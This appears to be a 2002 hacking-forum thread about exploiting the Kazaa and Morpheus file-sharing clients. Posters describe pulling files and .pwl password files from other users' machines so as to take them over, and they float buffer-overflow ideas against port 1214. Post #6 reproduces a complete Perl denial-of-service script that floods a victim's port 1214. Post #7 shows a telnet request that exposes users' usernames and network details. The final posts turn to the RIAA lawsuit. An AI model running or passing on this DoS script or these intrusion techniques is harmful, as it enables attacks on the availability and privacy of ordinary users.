-
January 16th, 2002, 05:40 AM
#1
morpheus/kazaa question
Ok, I've investigated the morpheus/kazaa deal. (i use morpheus) I've leeched files by doing this. But, is there a way I can upload files (txt. and exe.) into there computer this way?? Also is leeching files the only benefit of this exploit?
-
January 16th, 2002, 05:45 AM
#2
Member
yes...
yea you can only d/l files from them using this but, u can d/l there passwd or .plw file and get full access to there computer and do like that...
-
January 17th, 2002, 02:36 AM
#3
Junior Member
wait wait.. they would have had to share their whole HD to download a .pwl right? or am I missing something?
Anyway, has anyone found a way to maybe.. overload port 1214.. a buffer exploit maybe? (That port number is from memory that may be the wrong one.. )
~DW~
-
January 17th, 2002, 02:46 AM
#4
Member
not yet....
i really havn't looked to much after i found the flaw... i just made the tut and ened my reserch but i need to see if i can't find a way to do this.... ( http://www.angelfire.com/linux/antiw..._and_kazaa.txt )
-
January 21st, 2002, 01:03 PM
#5
Member
yeah i tried it, everytime i tried to connect to the 1214 port to view all their files i just got a page not found error..
also , i thought .pwl files where written in hex? i tried to open one with word pad and note pad but it just looked like unreadable jargon stuff ...
-
January 21st, 2002, 04:04 PM
#6
I found this DoS attack against KazaA/Morpheus at http://www.securityteam.com
Problem: Both Kazaa and Morpheus file sharing applications has a port
which allow anonymous file access to their shared folder. What does this have
to do with Denial of Service? Unlike connections made from other users
of the applications, the number of connections to the port cannot be
regulated or detected by the client. This obviously will allow us to flood the
server with requests and therefore use up all of the available bandwidth.
Also due to the fact that most users have setup their firewall privileges so
that Kazaa or Morpheus is allowed access to open connections to outside sources
his attack will bypass most personal firewall clients.
#!/usr/bin/perl
#
#Kazaa/Morpheus Denial of Service Attack
#
#Usage: ./km.pl -h victimip
use Socket;
use Getopt::Std;
getopts("h:", \%args);
print("\nK/M Denial of Service\n");
if (!defined $args{h}) {
print("Usage: km.pl -h victimip\n\n");
exit; }
$host = $args{h};
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");
$trash="A"x100;
&exec_cmd($command);
sub exec_cmd {
for($count=1;$count<=1000;$count++)
{
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
print("|");
}
print("\nData Sent.\n\n");
}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,1214,$target)){
my @in;
select(S); $|=1; print $pstr;
while(< S >){ push @in, $_;
print STDOUT "." if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
-
January 21st, 2002, 04:33 PM
#7
NewOrder [http://neworder.box.sk/showme.php3?id=5574]
Summary
Kazaa and Morpheus allow users to easily search, share, discover, create, and communicate with other users. These products reveal sensitive information about the remote host, and the username that is currently being used by the remote client.
Details
Example:
# telnet morpheus.users.ip.address
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 200 OK
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
-
January 21st, 2002, 04:40 PM
#8
Member
hmmmm
has anyone found a way to stop these exploits?????
Life is like a **** sandwich,
The more bread u have the less **** u have to eat
-
January 21st, 2002, 04:51 PM
#9
Nope....not yet...
I dont think there gunna make a patch... KazaA/Morpheus is shutting down soon
They got sued by the RIAA....
Top recording companies and motion picture studios have launched a post-Napster strike on digital music and video swapping with a lawsuit targeting peer-to-peer network technology known as FastTrack, but more familiar to Internet users under such names as Kazaa, Morpheus and Grokster.
I just have 1 question about this.... KazaA/Morpheus dont use servers..... Each user is their own node on the network.. So how can they shut it down ?
The full story can be found here
-
January 21st, 2002, 05:52 PM
#10
*sigh* Notice, it's the RIAA that's doing the suing...why? Because they're the ones losing out. The bands make **** compared to what the RIAA makes for each CD, tape, etc sold. You might get 2 bucks for each CD sold that your band made, but the RIAA gets say, 10? 500% profit, must be nice. **** them I say...they've been making gazillions of bucks yearly off of this and now, with p2p sharing and other methods putting out songs for free. The RIAA is afraid and so are these one-hit wonders that sell one cd single, make money, then bail.
I'd suggest going to audiogalaxy and get on the pay servers, which costs oh...4 bucks a month or something like that. That's more than reasonable for songs you can download.
Personally, the RIAA disgusts me. It's like the postal service saying they wanted to charge for each email sent because they're losing business. Yeah right bitches...tell it like it really is. If you're losing business then why're you having to jack the price of the stamp every year up 1 cent? Just make it .50 per stamp and leave me the fsck alone...
Somewhere, there's a survey showing that there was an increase in the sales of CDs after all this p2p because people could hear songs that they otherwise would never listen to. Prime case in point: me listening to an mp3 off of Audiogalaxy from Linkin Park called 'Part of me'...loved the song, so I went out and bought their cd, Hybrid Theory. Excellent CD.
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|